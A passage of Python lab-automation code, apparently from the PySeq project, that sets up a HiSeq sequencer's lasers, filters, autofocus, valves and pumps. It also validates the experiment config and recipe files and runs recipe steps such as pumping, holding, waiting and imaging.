hs.v24[AorB].sample_port = sample_port
hs.v24[AorB].port_dict = port_dict # Assign ports on HiSeq
if variable_ports is not None:
v_ports = variable_ports.split(',')
for v in v_ports: # Assign variable ports
hs.v24[AorB].variable_ports.append(v.strip())
hs.p[AorB].update_limits(n_barrels) # Assign barrels per lane to pump
for section in fc.sections: # Convert coordinate sections on flowcell to stage info
pos = hs.position(AorB, fc.sections[section])
fc.stage[section] = pos
fc.stage[section]['z_pos'] = [hs.z.image_step]*3
## TODO: Changing laser color unecessary for now, revist if upgrading HiSeq
# Configure laser color & filters
# colors = [method.get('laser color 1', fallback = 'green'),
# method.get('laser color 2', fallback = 'red')]
# for i, color in enumerate(default_colors):
# if color is not colors[i]:
# laser = hs.lasers.pop(color) # Remove default laser color
# hs.lasers[colors[i]] = laser # Add new laser
# hs.lasers[colors[i]].color = colors[i] # Update laser color
# hs.optics.colors[i] = colors[i] # Update laser line color
# Check laser power
for color in hs.lasers.keys():
lp = int(method.get(color+' laser power', fallback = 10))
if hs.lasers[color].min_power <= lp <= hs.lasers[color].max_power:
hs.lasers[color].set_point = lp
else:
error('MethodFile:: Invalid '+color+' laser power')
#Check filters for laser at each cycle are valid
hs.optics.cycle_dict = check_filters(hs.optics.cycle_dict, hs.optics.ex_dict)
focus_filters = [method.get('green focus filter', fallback = 2.0),
method.get('red focus filter', fallback = 2.4)]
for i, f in enumerate(focus_filters):
try:
f = float(f)
except:
pass
if f not in hs.optics.ex_dict[hs.optics.colors[i]]:
error('ConfigFile:: Focus filter not valid.')
else:
hs.optics.focus_filters[i] = f
# Check Autofocus Settings
hs.AF = method.get('autofocus', fallback = 'partial once')
if hs.AF.lower() in ['','none']: hs.AF = None
if hs.AF not in ['partial', 'partial once', 'full', 'full once', 'manual', None]:
# Skip autofocus and set objective position in config file
try:
if hs.obj.min_z <= int(hs.AF) <= hs.obj.max_z:
hs.AF = int(hs.AF)
except:
error('ConfigFile:: Auto focus method not valid.')
#Enable/Disable z stage
hs.z.active = method.getboolean('enable z stage', fallback = True)
# Get focus Tolerance
hs.focus_tol = float(method.get('focus tolerance', fallback = 0))
# Get focus range
range = float(method.get('focus range', fallback = 90))
spacing = float(method.get('focus spacing', fallback = 4.1))
hs.obj.update_focus_limits(range=range, spacing=spacing) # estimate, get actual value in hs.obj_stack()
hs.stack_split = float(method.get('stack split', fallback = 2/3))
hs.bundle_height = int(method.get('bundle height', fallback = 128))
# Assign output directory
save_path = experiment['save path']
experiment_name = experiment['experiment name']
save_path = join(experiment['save path'], experiment['experiment name'])
if not os.path.exists(save_path):
try:
os.mkdir(save_path)
except:
error('ConfigFile:: Save path not valid.')
# Assign image directory
image_path = join(save_path, experiment['image path'])
if not os.path.exists(image_path):
os.mkdir(image_path)
with open(join(image_path,'machine_name.txt'),'w') as file:
file.write(hs.name)
hs.image_path = image_path
# Assign log directory
log_path = join(save_path, experiment['log path'])
if not os.path.exists(log_path):
os.mkdir(log_path)
hs.log_path = log_path
return hs
def confirm_settings(recipe_z_planes = []):
"""Have user confirm the HiSeq settings before experiment."""
experiment = config['experiment']
method = experiment['method']
method = config[method]
total_cycles = int(experiment['cycles'])
# Print settings to screen
try:
import tabulate
print_table = True
except:
print_table = False
if n_errors > 0:
print()
if not userYN('Continue checking experiment before exiting'):
sys.exit()
# Experiment summary
print()
print('-'*80)
print()
print(experiment['experiment name'], 'summary')
print()
print('method:', experiment['method'])
print('recipe:', method['recipe'])
print('cycles:', experiment['cycles'])
pre_recipe = method.get('pre recipe', fallback = None)
if pre_recipe is not None:
print('pre recipe:', pre_recipe)
first_port = method.get('first port', fallback = None)
if first_port is not None:
print('first_port:', first_port)
print('save path:', experiment['save path'])
print('enable z stage:', hs.z.active)
print('machine:', experiment['machine'])
print()
if not userYN('Confirm experiment'):
sys.exit()
print()
# Flowcell summary
table = {}
for fc in flowcells:
table[fc] = flowcells[fc].sections.keys()
print('-'*80)
print()
print('Flowcells:')
print()
if print_table:
print(tabulate.tabulate(table, headers = 'keys', tablefmt = 'presto'))
else:
print(table)
print()
if not userYN('Confirm flowcells'):
sys.exit()
print()
# Valve summary:
table = []
ports = []
for port in port_dict:
if not isinstance(port_dict[port], dict):
ports.append(int(port_dict[port]))
table.append([port_dict[port], port])
print('-'*80)
print()
print('Valve:')
print()
if print_table:
print(tabulate.tabulate(table, headers=['port', 'reagent'], tablefmt = 'presto'))
else:
print(table)
print()
if not userYN('Confirm valve assignment'):
sys.exit()
print()
# Pump summary:
AorB = [*flowcells.keys()][0]
fc = flowcells[AorB]
print('-'*80)
print()
print('Pump Settings:')
print()
inlet_ports = int(method.get('inlet ports', fallback = 2))
print('Reagents pumped through row with ', inlet_ports, 'inlet ports')
print(hs.p[AorB].n_barrels, 'syringe pump barrels per lane')
print('Flush volume:',fc.volume['flush'], 'μL')
if any([True for port in ports if port in [*range(1,9),*range(10,20)]]):
print('Main prime volume:', fc.volume['main'], 'μL')
if any([True for port in ports if port in [9,21,22,23,24]]):
print('Side prime volume:', fc.volume['side'], 'μL')
if 20 in ports:
print('Sample prime volume:', fc.volume['sample'], 'μL')
print('Flush flowrate:',fc.pump_speed['flush'], 'μL/min')
print('Prime flowrate:',fc.pump_speed['prime'], 'μL/min')
print('Reagent flowrate:',fc.pump_speed['reagent'], 'μL/min')
print('Max volume:', hs.p[AorB].max_volume, 'μL')
print('Min flow:', hs.p[AorB].min_flow, 'μL/min')
print()
if not userYN('Confirm pump settings'):
sys.exit()
# Cycle summary:
variable_ports = hs.v24[AorB].variable_ports
start_cycle = 1
if method.get('pre recipe', fallback = None) is not None:
start_cycle = 0
table = []
for cycle in range(start_cycle,total_cycles+1):
row = []
row.append(cycle)
if len(variable_ports) > 0:
for vp in variable_ports:
if cycle > 0:
row.append(port_dict[vp][cycle])
else:
row.append(None)
if IMAG_counter > 0:
colors = [*hs.optics.cycle_dict.keys()]
for color in colors:
row.append(hs.optics.cycle_dict[color][cycle])
else:
colors = []
table.append(row)
print('-'*80)
print()
print('Cycles:')
print()
if len(variable_ports) + len(colors) > 0:
headers = ['cycle', *variable_ports, *colors]
if print_table:
print(tabulate.tabulate(table, headers, tablefmt='presto'))
else:
print(headers)
print(table)
print()
stop_experiment = not userYN('Confirm cycles')
else:
if total_cycles == 1:
stop_experiment = not userYN('Confirm only 1 cycle')
else:
stop_experiment = not userYN('Confirm all', total_cycles, 'cycles are the same')
if stop_experiment:
sys.exit()
print()
if IMAG_counter > 0:
print('-'*80)
print()
print('Imaging settings:')
print()
laser_power = [hs.lasers['green'].set_point,
hs.lasers['red'].set_point]
print('green laser power:', laser_power[0], 'mW')
print('red laser power:',laser_power[1], 'mW')
print('autofocus:', hs.AF)
if hs.AF is not None:
print('focus spacing', hs.obj.focus_spacing,'um')
print('focus range', hs.obj.focus_range, '%')
if hs.focus_tol > 0 and hs.AF != 'manual':
print('focus tolerance:', hs.focus_tol, 'um')
elif hs.AF != 'manual':
print('focus tolerance: None')
print('WARNING::Out of focus image risk increased')
for i, filter in enumerate(hs.optics.focus_filters):
if filter == 'home':
focus_laser_power = 0
elif filter == 'open':
focus_laser_power = laser_power[i]
else:
focus_laser_power = laser_power[i]*10**(-float(filter))
print(colors[i+1], 'focus laser power ~', focus_laser_power, 'mW')
print('z position when imaging:', hs.z.image_step)
if hs.overlap > 0:
print('pixel overlap:', hs.overlap)
print('overlap direction:', hs.overlap_dir)
z_planes = int(method.get('z planes', fallback = 0))
if z_planes > 0:
print('z planes:', z_planes)
else:
print('z planes:', *recipe_z_planes)
if z_planes > 1 or any(recipe_z_planes):
print('stack split:', hs.stack_split)
if not userYN('Confirm imaging settings'):
sys.exit()
# Check if previous focus positions have been found, and confirm to use
if os.path.exists(join(hs.log_path, 'focus_config.cfg')):
focus_config = configparser.ConfigParser()
focus_config.read(join(hs.log_path, 'focus_config.cfg'))
cycles = 0
sections = []
for section in config.options('sections'):
if focus_config.has_section(section):
sections.append(section)
n_focus_cycles = len(focus_config.options(section))
if n_focus_cycles > cycles:
cycles = n_focus_cycles
table = []
for section in sections:
row = []
row.append(section)
for c in range(1,cycles+1):
if focus_config.has_option(section, str(c)):
row.append(focus_config[section][str(c)])
else:
row.append(None)
table.append(row)
if len(sections) > 0 and cycles > 0:
print('-'*80)
print()
print('Previous Autofocus Objective Positions:')
print()
headers = ['section', *['cycle'+str(c) for c in range(1,cycles+1)]]
if print_table:
print(tabulate.tabulate(table, headers, tablefmt='presto'))
else:
print(headers)
print(table)
print()
if not userYN('Confirm using previous autofocus positions'):
sys.exit()
print()
##########################################################
## Setup HiSeq ###########################################
##########################################################
def initialize_hs(IMAG_counter):
"""Initialize the HiSeq and return the handle."""
global n_errors
experiment = config['experiment']
method = experiment['method']
method = config[method]
if n_errors is 0:
if not userYN('Initialize HiSeq'):
sys.exit()
hs.initializeCams(logger)
x_homed = hs.initializeInstruments()
if not x_homed:
error('HiSeq:: X-Stage did not home correctly')
# HiSeq Settings
inlet_ports = int(method.get('inlet ports', fallback = 2))
hs.move_inlet(inlet_ports) # Move to 2 or 8 port inlet
# Set laser power
for color in hs.lasers.keys():
laser_power = int(method.get(color+' laser power', fallback = 10))
hs.lasers[color].set_power(laser_power)
if IMAG_counter > 0:
if not hs.lasers[color].on:
error('HiSeq:: Lasers did not turn on.')
hs.f.LED('A', 'off')
hs.f.LED('B', 'off')
LED('all', 'startup')
hs.move_stage_out()
return hs
##########################################################
## Check Instructions ####################################
##########################################################
def check_instructions():
"""Check the instructions for errors.
**Returns:**
- first_line (int): Line number for the recipe to start from on the
initial cycle.
- IMAG_counter (int): The number of imaging steps.
"""
method = config.get('experiment', 'method')
method = config[method]
first_port = method.get('first port', fallback = None) # Get first reagent to use in recipe
# Backdoor to input line number for first step in recipe
try:
first_port = int(first_port)
first_line = first_port
first_port = None
except:
first_line = 0
variable_ports = method.get('variable reagents', fallback = None)
valid_wait = []
ports = []
for port in config['reagents'].items():
ports.append(port[1])
if variable_ports is not None:
variable_ports = variable_ports.split(',')
for port in variable_ports:
ports.append(port.strip())
valid_wait = ports
valid_wait.append('IMAG')
valid_wait.append('STOP')
valid_wait.append('TEMP')
recipes = {}
recipes['Recipe'] = config['experiment']['recipe path']
pre_recipe = method.get('pre recipe',fallback= None)
if pre_recipe is not None:
recipes['Pre Recipe'] = pre_recipe
for recipe in sorted([*recipes.keys()]):
f = recipes[recipe]
try:
f = open(recipes[recipe])
except:
error(recipe,'::Unable to open', recipes[recipe])
#Remove blank lines
f_ = [line for line in f if line.strip()]
f.close()
IMAG_counter = 0.0
wait_counter = 0
z_planes = []
for line_num, line in enumerate(f_):
instrument, command = parse_line(line)
if instrument == 'PORT':
# Make sure ports in instruction files exist in port dictionary in config file
if command not in ports:
error(recipe,'::', command, 'on line', line_num,
'is not listed as a reagent')
#Find line to start at for first cycle
if first_line == 0 and first_port is not None and recipe is 'Recipe':
if command.find(first_port) != -1:
first_line = line_num
# Make sure pump volume is a number
elif instrument == 'PUMP':
if command.isdigit() == False:
error(recipe,'::Invalid volume on line', line_num)
# Make sure wait command is valid
elif instrument == 'WAIT':
wait_counter += 1
if command not in valid_wait:
error(recipe,'::Invalid wait command on line', line_num)
# Make sure z planes is a number
elif instrument == 'IMAG':
IMAG_counter = int(IMAG_counter + 1)
# Flag to make check WAIT is used before IMAG for 2 flowcells
if wait_counter >= IMAG_counter:
IMAG_counter = float(IMAG_counter)
if command.isdigit() == False:
error(recipe,'::Invalid number of z planes on line', line_num)
else:
z_planes.append(command)
# Make sure hold time (minutes) is a number
elif instrument == 'HOLD':
if command.isdigit() == False:
if command != 'STOP':
error(recipe,'::Invalid time on line', line_num)
else:
print(recipe,'::WARNING::HiSeq will stop until user input at line',
line_num)
elif instrument == 'TEMP':
if not command.isdigit():
error(recipe,'::Invalid temperature on line', line_num)
# # Warn user that HiSeq will completely stop with this command
# elif instrument == 'STOP':
# print('WARNING::HiSeq will stop until user input at line',
# line_num)
# Make sure the instrument name is valid
else:
error(recipe,'::Bad instrument name on line',line_num)
print(line)
return first_line, IMAG_counter, z_planes
##########################################################
## Check Ports ###########################################
##########################################################
def check_ports():
"""Check for port errors and return a port dictionary.
"""
method = config.get('experiment', 'method')
method = config[method]
total_cycles = int(config.get('experiment', 'cycles'))
# Get cycle and port information from configuration file
valve = config['reagents'] # Get dictionary of port number of valve : name of reagent
cycle_variables = method.get('variable reagents', fallback = None ) # Get list of port names in recipe that change every cycle
cycle_reagents = config['cycles'].items() # Get variable reagents that change with each cycle
port_dict = {}
# Make sure there are no duplicated names in the valve
if len(valve.values()) != len(set(valve.values())):
error('ConfigFile: Reagent names are not unique')
#TODO: PRINT DUPLICATES
if len(valve) > 0:
# Create port dictionary
for port in valve.keys():
try:
port_dict[valve[port]] = int(port)
except:
error('ConfigFile:List reagents as n (int) = name (str) ')
# Add cycle variable port dictionary
if cycle_variables is not None:
cycle_variables = cycle_variables.split(',')
for variable in cycle_variables:
variable = variable.replace(' ','')
if variable in port_dict:
error('ConfigFile::Variable', variable, 'can not be a reagent')
else:
port_dict[variable] = {}
# Fill cycle variable port dictionary with cycle: reagent name
for cycle in cycle_reagents:
reagent = cycle[1]
variable, cyc_number = cycle[0].split(' ')
if reagent in valve.values():
if variable in port_dict:
port_dict[variable][int(cyc_number)] = reagent
else:
error('ConfigFile::', variable, 'not listed as variable reagent')
else:
error('ConfigFiles::Cycle reagent:', reagent, 'does not exist on valve')
# Check number of reagents in variable reagents matches number of total cycles
for variable in cycle_variables:
variable = variable.replace(' ','')
if len(port_dict[variable]) != total_cycles:
error('ConfigFile::Number of', variable, 'reagents does not match experiment cycles')
else:
print('WARNING::No ports are specified')
# table = []
# for port in port_dict:
# if not isinstance(port_dict[port], dict):
# table.append([port_dict[port], port])
# print('Valve summary')
# print(tabulate.tabulate(table, headers=['port', 'reagent'], tablefmt = 'presto'))
return port_dict
def check_filters(cycle_dict, ex_dict):
"""Check filter section of config file.
**Errors:**
- Invalid Filter: System exits when a listed filter does not match
configured filters on the HiSeq.
- Duplicate Cycle: System exists when a filter for a laser is listed for
the same cycle more than once.
- Invalid laser: System exits when a listed laser color does not match
configured laser colors on the HiSeq.
"""
colors = [*cycle_dict.keys()]
# Check laser, cycle, and filter are valid
cycle_filters = config['filters'].items()
for item in cycle_filters:
# Get laser cycle = filter
filter = item[1]
# filters are floats, except for home and open,
# and emission (True/False)
if filter.lower() in ['true', 'yes', '1', 't', 'y']:
filter = True
elif filter.lower() in ['false', 'no', '0', 'f', 'n']:
filter = False
elif filter not in ['home','open']:
filter = float(filter)
laser, cycle = item[0].split()
cycle = int(cycle)
# Check if laser is valid, can use partial match ie, g or G for green
if laser in colors:
laser = [laser]
else:
laser = [colors[i] for i, c in enumerate(colors) if laser.lower() in c[0]]
if len(laser) > 0:
laser = laser[0]
if laser in ex_dict.keys():
if filter in ex_dict[laser]:
if cycle not in cycle_dict[laser]:
cycle_dict[laser][cycle] = filter
else:
error('ConfigFile::Duplicated cycle for', laser, 'laser')
elif laser == 'em':
if isinstance(filter, bool):
if cycle not in cycle_dict[laser]:
cycle_dict[laser][cycle] = filter
else:
error('ConfigFile::Duplicated emission filter cycle')
else:
error('ConfigFile::Invalid filter for', laser, 'laser')
else:
error('ConfigFile:Invalid laser')
# Add default/home to cycles with out filters specified
method = config.get('experiment', 'method')
method = config[method]
start_cycle = 1
if method.get('pre recipe', fallback = None):
start_cycle = 0
last_cycle = int(config.get('experiment','cycles'))+1
# Get/check default filters
default_filters = {}
fallbacks = {'red':'home', 'green':'home', 'em':'True'}
for laser in colors:
filter = method.get('default '+laser+' filter', fallback = fallbacks[laser])
try:
filter = float(filter)
except:
pass
if laser in ex_dict.keys():
if filter in ex_dict[laser].keys():
default_filters[laser] = filter
elif laser == 'em':
if filter in ['True', 'False']:
default_filters[laser] = filter
# Assign default filters to missing cycles
for cycle in range(start_cycle,last_cycle):
for laser in colors:
if cycle not in cycle_dict[laser]:
cycle_dict[laser][cycle] = default_filters[laser]
return cycle_dict
def LED(AorB, indicate):
"""Control front LEDs to communicate what the HiSeq is doing.
**Parameters:**
- AorB (str): Flowcell position (A or B), or all.
- indicate (str): Current action of the HiSeq or state of the flowcell.
=========== =========== =============================
LED MODE indicator HiSeq Action / Flowcell State
=========== =========== ===================================================
off off The flowcell is not in use.
yellow error There is an error with the flowcell.
green startup The HiSeq is starting up or shutting down
pulse green user The HiSeq requires user input
blue sleep The flowcell is holding or waiting.
pulse blue awake HiSeq valve, pump, or temperature action on the flowcell.
sweep blue imaging HiSeq is imaging the flowcell.
=========== =========== ========================================
"""
fc = []
if AorB in flowcells.keys():
fc = [AorB]
elif AorB == 'all':
fc = [*flowcells.keys()]
for AorB in fc:
if indicate == 'startup':
hs.f.LED(AorB, 'green')
elif indicate == 'user':
hs.f.LED(AorB, 'pulse green')
elif indicate == 'error':
hs.f.LED(AorB, 'yellow')
elif indicate == 'sleep':
hs.f.LED(AorB, 'blue')
elif indicate == 'awake':
hs.f.LED(AorB, 'pulse blue')
elif indicate == 'imaging':
hs.f.LED(AorB, 'sweep blue')
elif indicate == 'off':
hs.f.LED(AorB, 'off')
return True
def userYN(*args):
"""Ask a user a Yes/No question and return True if Yes, False if No."""
question = ''
for a in args:
question += str(a) + ' '
response = True
while response:
answer = input(question + '? Y/N = ')
answer = answer.upper().strip()
if answer == 'Y':
response = False
answer = True
elif answer == 'N':
response = False
answer = False
return answer
def do_flush():
"""Flush all, some, or none of lines."""
AorB_ = [*flowcells.keys()][0]
port_dict = hs.v24[AorB_].port_dict
# Select lines to flush
LED('all', 'user')
confirm = False
while not confirm:
flush_ports = input("Flush all, some, or none of the lines? ")
if flush_ports.strip().lower() == 'all':
flush_all = True
flush_ports = [*port_dict.keys()]
for vp in hs.v24[AorB_].variable_ports:
if vp in flush_ports:
flush_ports.remove(vp)
confirm = userYN('Confirm flush all lines')
elif flush_ports.strip().lower() in ['none', 'N', 'n', '']:
flush_ports = []
confirm = userYN('Confirm skip flushing lines')
else:
good =[]
bad = []
for fp in flush_ports.split(','):
fp = fp.strip()
if fp in port_dict.keys():
good.append(fp)
else:
try:
fp = int(fp)
if fp in range(1,hs.v24[AorB_].n_ports+1):
good.append(fp)
else:
bad.append(fp)
except:
bad.append(fp)
if len(bad) > 0:
print('Valid ports:', *good)
print('Invalid ports:', *bad)
confirm = not userYN('Re-enter lines to flush')
else:
confirm = userYN('Confirm only flushing',*good)
if confirm:
flush_ports = good
if len(flush_ports) > 0:
while not userYN('Temporary flowcell(s) locked on to stage'): pass
while not userYN('All valve input lines in water'): pass
while not userYN('Ready to flush'): pass
LED('all', 'startup')
# Flush ports
speed = flowcells[AorB_].pump_speed['flush']
volume = flowcells[AorB_].volume['flush']
for port in flush_ports:
if port in hs.v24[AorB_].variable_ports:
flush_ports.append(*hs.v24[AorB_].port_dict[port].values())
else:
hs.message('Flushing ' + str(port))
for fc in flowcells.values():
AorB = fc.position
fc.thread = threading.Thread(target=hs.v24[AorB].move,
args=(port,))
fc.thread.start()
alive = True
while alive:
alive_ = []
for fc in flowcells.values():
alive_.append(fc.thread.is_alive())
alive = any(alive_)
for fc in flowcells.values():
AorB = fc.position
fc.thread = threading.Thread(target=hs.p[AorB].pump,
args=(volume, speed,))
fc.thread.start()
alive = True
while alive:
alive_ = []
for fc in flowcells.values():
alive_.append(fc.thread.is_alive())
alive = any(alive_)
##########################################################
## Flush Lines ###########################################
##########################################################
def do_prime(flush_YorN):
"""Prime lines with all reagents in config if prompted."""
LED('all', 'user')
## Prime lines
confirm = False
while not confirm:
prime_YorN = userYN("Prime lines")
if prime_YorN:
confirm = userYN("Confirm prime lines")
else:
confirm = userYN("Confirm skip priming lines")
# LED('all', 'startup')
# hs.z.move([0,0,0])
# hs.move_stage_out()
#LED('all', 'user')
if prime_YorN:
if flush_YorN:
while not userYN('Temporary flowcell(s) locked on to stage'): pass
while not userYN('Valve input lines in reagents'): pass
while not userYN('Ready to prime lines'): pass
#Flush all lines
LED('all', 'startup')
while True:
AorB_ = [*flowcells.keys()][0]
port_dict = hs.v24[AorB_].port_dict
speed = flowcells[AorB_].pump_speed['prime']
for port in port_dict.keys():
if isinstance(port_dict[port], int):
hs.message('Priming ' + str(port))
for fc in flowcells.values():
port_num = port_dict[port]
AorB = fc.position
fc.thread = threading.Thread(target=hs.v24[AorB].move,
args=(port,))
fc.thread.start()
alive = True
while alive:
alive_ = []
for fc in flowcells.values():
alive_.append(fc.thread.is_alive())
alive = any(alive_)
for fc in flowcells.values():
if port_num in hs.v24[AorB].side_ports:
volume = fc.volume['side']
elif port_num == hs.v24[AorB].sample_port:
volume = fc.volume['sample']
else:
volume = fc.volume['main']
AorB = fc.position
fc.thread = threading.Thread(target=hs.p[AorB].pump,
args=(volume, speed,))
fc.thread.start()
alive = True
while alive:
alive_ = []
for fc in flowcells.values():
alive_.append(fc.thread.is_alive())
alive = any(alive_)
break
# Rinse flowcells
method = config.get('experiment', 'method') # Read method specific info
method = config[method]
rinse_port = method.get('rinse', fallback = None)
rinse = rinse_port in hs.v24[AorB].port_dict
if rinse_port == port: # Option to skip rinse if last reagent pump was rinse reagent
rinse = False
# Get rinse reagents
if not rinse:
LED('all', 'user')
print('Last reagent pumped was', port)
if userYN('Rinse flowcell'):
while not rinse:
if rinse_port not in hs.v24[AorB].port_dict:
rinse_port = input('Specify rinse reagent: ')
rinse = rinse_port in hs.v24[AorB].port_dict
if not rinse:
print('ERROR::Invalid rinse reagent')
print('Choose from:', *list(hs.v24[AorB].port_dict.keys()))
if rinse:
# Simultaneously Rinse Flowcells
for fc in flowcells.values():
fc.thread = threading.Thread(target=do_rinse,
args=(fc,rinse_port,))
fc.thread.start()
alive = True
# Wait for rinsing to complete
while alive:
alive_ = []
for fc in flowcells.values():
alive_.append(fc.thread.is_alive())
alive = any(alive_)
LED('all', 'user')
while not userYN('Temporary flowcell(s) removed'): pass
while not userYN('Experiment flowcell(s) locked on to stage'): pass
if not prime_YorN:
while not userYN('Valve input lines in reagents'): pass
while not userYN('Door closed'): pass
##########################################################
def do_nothing():
"""Do nothing."""
pass
##########################################################
## iterate over lines, send to pump, and print response ##
##########################################################
def do_recipe(fc):
"""Do the next event in the recipe.
**Parameters:**
- fc (flowcell): The current flowcell.
"""
AorB = fc.position
fc.thread = None
# Skip to first line of recipe on initial cycle
if fc.cycle == 1 and fc.first_line is not None:
for i in range(fc.first_line):
line = fc.recipe.readline()
fc.first_line = None
#get instrument and command
instrument = None
while instrument is None:
line = fc.recipe.readline()
if line:
instrument, command = parse_line(line)
else:
break
if line:
# Move reagent valve
if instrument == 'PORT':
#Move to cycle specific reagent if it is variable a reagent
if fc.cycle <= fc.total_cycles:
if command in hs.v24[AorB].variable_ports:
command = hs.v24[AorB].port_dict[command][fc.cycle]
log_message = 'Move to ' + command
fc.thread = threading.Thread(target = hs.v24[AorB].move,
args = (command,))
if fc.cycle <= fc.total_cycles:
LED(AorB, 'awake')
# Pump reagent into flowcell
elif instrument == 'PUMP':
volume = int(command)
speed = fc.pump_speed['reagent']
log_message = 'Pumping ' + str(volume) + ' uL'
fc.thread = threading.Thread(target = hs.p[AorB].pump,
args = (volume, speed,))
if fc.cycle <= fc.total_cycles:
LED(AorB, 'awake')
# Incubate flowcell in reagent for set time
elif instrument == 'HOLD':
if command.isdigit():
holdTime = float(command)*60
log_message = 'Flowcell holding for ' + str(command) + ' min.'
if hs.virtual:
fc.thread = threading.Timer(holdTime/hs.speed_up, fc.endHOLD)
#fc.thread = threading.Timer(holdTime, fc.endHOLD)
else:
fc.thread = threading.Timer(holdTime, fc.endHOLD)
elif command == 'STOP':
hs.message('PySeq::Paused')
LED(AorB, 'user')
input("Press enter to continue...")
log_message = ('Continuing...')
fc.thread = threading.Thread(target = do_nothing)
if fc.cycle <= fc.total_cycles:
LED(AorB, 'sleep')
# Wait for other flowcell to finish event before continuing with current flowcell
elif instrument == 'WAIT':
if command == 'TEMP':
fc.thread = threading.Thread(target = hs.T.wait_fc_T,
args=(AorB, fc.temperature,))
log_message = ('Waiting to reach '+str(fc.temperature)+'°C')
elif fc.waits_for is not None:
if command in flowcells[fc.waits_for].events_since_IMAG:
log_message = command + ' has occurred, skipping WAIT'
fc.thread = threading.Thread(target = do_nothing)
else:
log_message = 'Waiting for ' + command
fc.thread = threading.Thread(target = WAIT,
args = (AorB, command,))
else:
log_message = 'Skip waiting for ' + command
fc.thread = threading.Thread(target = do_nothing)
if fc.cycle <= fc.total_cycles:
LED(AorB, 'sleep')
# Image the flowcell
elif instrument == 'IMAG':
if hs.scan_flag and fc.cycle <= fc.total_cycles:
hs.message('PySeq::'+AorB+'::Waiting for camera')
while hs.scan_flag:
pass
#hs.scan_flag = True
fc.events_since_IMAG = []
log_message = 'Imaging flowcell'
fc.thread = threading.Thread(target = IMAG,
args = (fc,int(command),))
if fc.cycle <= fc.total_cycles:
LED(AorB, 'imaging')
elif instrument == 'TEMP':
log_message = 'Setting temperature to ' + command + ' °C'
command = float(command)
fc.thread = threading.Thread(target = hs.T.set_fc_T,
args = (AorB,command,))
fc.temperature = command
# Block all further processes until user input
# elif instrument == 'STOP':
# hs.message('PySeq::Paused')
# LED(AorB, 'user')
# input("Press enter to continue...")
# hs.message('PySeq::Continuing...')
#Signal to other flowcell that current flowcell reached signal event
if fc.signal_event == instrument or fc.signal_event == command:
fc.wait_thread.set()
fc.signal_event = None
# Start new action on current flowcell
if fc.thread is not None and fc.cycle <= fc.total_cycles:
fc.addEvent(instrument, command)
hs.message('PySeq::'+AorB+'::cycle'+str(fc.cycle)+'::'+log_message)
thread_id = fc.thread.start()
elif fc.thread is not None and fc.cycle > fc.total_cycles:
fc.thread = threading.Thread(target = time.sleep, args = (10,))
else:
# End of recipe
fc.restart_recipe()
##########################################################
## Image flowcell ########################################
##########################################################
def IMAG(fc, n_Zplanes):
"""Image the flowcell at a number of z planes.
For each section on the flowcell, the stage is first positioned
to the center of the section to find the optimal focus. Then if no
optical settings are listed, the optimal filter sets are found.
Next, the stage is repositioned to scan the entire section and
image the specified number of z planes.
**Parameters:**
fc: The flowcell to image.
n_Zplanes: The number of z planes to image.
**Returns:**
int: Time in seconds to scan the entire section.
"""
hs.scan_flag = True
AorB = fc.position
cycle = str(fc.cycle)
start = time.time()
# Manual focus ALL sections across flowcells
if hs.AF == 'manual':
focus.manual_focus(hs, flowcells)
hs.AF = 'partial once'
#Image sections on flowcell
for section in fc.sections:
pos = fc.stage[section]
hs.y.move(pos['y_initial'])
hs.x.move(pos['x_initial'])
hs.z.move(pos['z_pos'])
hs.obj.move(hs.obj.focus_rough)
# Autofocus
msg = 'PySeq::' + AorB + '::cycle' + cycle+ '::' + str(section) + '::'
if hs.AF and not isinstance(hs.AF, int):
obj_pos = focus.get_obj_pos(hs, section, cycle)
if obj_pos is None:
# Move to focus filters
for i, color in enumerate(hs.optics.colors):
hs.optics.move_ex(color,hs.optics.focus_filters[i])
hs.message(msg + 'Start Autofocus')
try:
if hs.autofocus(pos): # Moves to optimal objective position
hs.message(msg + 'Autofocus complete')
pos['obj_pos'] = hs.obj.position
else: # Moves to rough focus objective position
hs.message(msg + 'Autofocus failed')
pos['obj_pos'] = None
except:
hs.message(msg + 'Autofocus failed')
print(sys.exc_info()[0])
pos['obj_pos'] = None
else:
hs.obj.move(obj_pos)
pos['obj_pos'] = hs.obj.position
focus.write_obj_pos(hs, section, cycle)
#Override recipe number of z planes
if fc.z_planes is not None: n_Zplanes = fc.z_planes
# Calculate objective positions to image
if n_Zplanes > 1 and not isinstance(hs.AF, int):
obj_start = int(hs.obj.position - hs.nyquist_obj*n_Zplanes*hs.stack_split) # (Default) 2/3 of planes below opt_ob_pos and 1/3 of planes above
elif isinstance(hs.AF, int):
obj_start = hs.AF
else:
obj_start = hs.obj.position
image_name = AorB
image_name += '_s' + str(section)
image_name += '_r' + cycle
if fc.IMAG_counter is not None:
image_name += '_' + str(fc.IMAG_counter)
# Scan section on flowcell
hs.y.move(pos['y_initial'])
hs.x.move(pos['x_initial'])
hs.obj.move(obj_start)
n_tiles = pos['n_tiles']
n_frames = pos['n_frames']
# Set filters
for color in hs.optics.cycle_dict.keys():
filter = hs.optics.cycle_dict[color][fc.cycle]
if color is 'em':
hs.optics.move_em_in(filter)
else:
hs.optics.move_ex(color, filter)
hs.message(msg + 'Start Imaging')
try:
scan_time = hs.scan(n_tiles, n_Zplanes, n_frames, image_name)
scan_time = str(int(scan_time/60))
hs.message(msg + 'Imaging completed in', scan_time, 'minutes')
except:
error('Imaging failed.')
# Reset filters
for color in hs.optics.cycle_dict.keys():
if color is 'em':
hs.optics.move_em_in(True)
else:
hs.optics.move_ex(color, 'home')
if fc.IMAG_counter is not None:
fc.IMAG_counter += 1
hs.scan_flag = False
def WAIT(AorB, event):
"""Hold the flowcell *AorB* until the specfied event in the other flowell.
**Parameters:**
AorB (str): Flowcell position, A or B, to be held.
event: Event in the other flowcell that releases the held flowcell.
**Returns:**
int: Time in seconds the current flowcell was held.
"""
signaling_fc = flowcells[AorB].waits_for
cycle = str(flowcells[AorB].cycle)
start = time.time()
flowcells[signaling_fc].signal_event = event # Set the signal event in the signal flowcell
flowcells[signaling_fc].wait_thread.wait() # Block until signal event in signal flowcell
hs.message('PySeq::'+AorB+'::cycle'+cycle+'::Flowcell ready to continue')
flowcells[signaling_fc].wait_thread.clear() # Reset wait event
stop = time.time()
return stop-start
def do_rinse(fc, port=None):
"""Rinse flowcell with reagent specified in config file.
**Parameters:**
fc (flowcell): The flowcell to rinse.
"""
method = config.get('experiment', 'method') # Read method specific info
method = config[method]
if port is None:
port = method.get('rinse', fallback = None)
AorB = fc.position
rinse = port in hs.v24[AorB].port_dict
if rinse:
LED(fc.position, 'awake')
# Move valve
